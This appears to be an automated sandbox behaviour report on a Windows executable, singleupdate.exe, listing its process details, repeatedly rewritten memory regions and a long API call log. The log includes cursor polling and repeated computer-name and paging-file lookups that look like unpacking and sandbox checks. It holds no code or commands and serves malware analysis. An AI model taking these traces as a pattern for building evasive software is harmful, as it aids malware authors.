singleupdate.exe
Windows Exe (x86-32)
Created at 2019-04-12T09:14:00
Monitored Processes
Behavior Information - Sequential View
Process #1: singleupdate.exe
2559
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\fd1hvy\desktop\singleupdate.exe |
| Command Line | "C:\Users\FD1HVy\Desktop\singleupdate.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:09, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:06, Reason: Self Terminated |
| Monitor Duration | 00:00:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfa0 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
720
0x
E5C
0x
210
0x
BEC
0x
B08
0x
A70
0x
FC8
0x
E38
0x
4F0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| buffer | 0x02200000 | 0x02207FFF | First Execution | - | 32-bit | 0x02201540, 0x02200000 |
|
|
|
| buffer | 0x02150000 | 0x02150FFF | First Execution | - | 32-bit | 0x02150000 |
|
|
|
| buffer | 0x02200000 | 0x02207FFF | Content Changed | - | 32-bit | 0x02205844, 0x022030F4 |
|
|
|
| buffer | 0x02200000 | 0x02207FFF | Content Changed | - | 32-bit | 0x02204CB4 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Marked Writable | - | 32-bit | - |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00401110 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0040EB38, 0x0040F130 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0040B764 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00417D3C |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00410838 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00413074 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0042A5C8 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0042B67C, 0x0042CC58 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00423564, 0x00429864 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00414000 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00420000, 0x0041FA70, ... |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00426B84 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Process Termination | - | 32-bit | - |
|
|
|
Threads
Thread 0x720
1853
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, address_out = 0x74f97060 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x74f9bea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x74f92550 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = InitializeCriticalSectionEx, address_out = 0x74f97060 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x74f9bea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsGetValue, address_out = 0x74f870c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x74f92550 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Load | module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LCMapStringEx, address_out = 0x74f7ed00 |
|
1 | |
| Module | Get Filename | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 261 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x75ea4280 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x74f95550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x75efeb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x75ea43d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x75eff110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c13a00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeConditionVariable, address_out = 0x77c88c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c18a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x7500fca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSRWLock, address_out = 0x77c13a00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x77bf58e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x7500fcf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x75ea6db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x77bfeb00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x77bfed50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-string-l1-1-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = CompareStringEx, address_out = 0x74f62c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = EnumSystemLocalesEx, address_out = 0x74f63a60 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-datetime-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetDateFormatEx, address_out = 0x74fd9b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetLocaleInfoEx, address_out = 0x74f8f170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetTimeFormatEx, address_out = 0x74fd9e10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetUserDefaultLocaleName, address_out = 0x74f94220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = IsValidLocaleName, address_out = 0x74f8ed60 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-localization-obsolete-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LCIDToLocaleName, address_out = 0x74f8da50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LocaleNameToLCID, address_out = 0x74f6bac0 |
|
1 | |
| COM | Create | interface = A95664D2-9614-4F35-A746-DE8DB63617E6, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| System | Get Cursor | x_out = 846, y_out = 117 |
|
697 | |
| System | Get Time | type = Local Time, time = 2019-04-12 11:16:38 (Local Time) |
|
1 | |
| System | Get Cursor | x_out = 846, y_out = 117 |
|
2 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsGetValue, address_out = 0x74f870c0 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
67 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77bb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memcpy, address_out = 0x77c27b00 |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
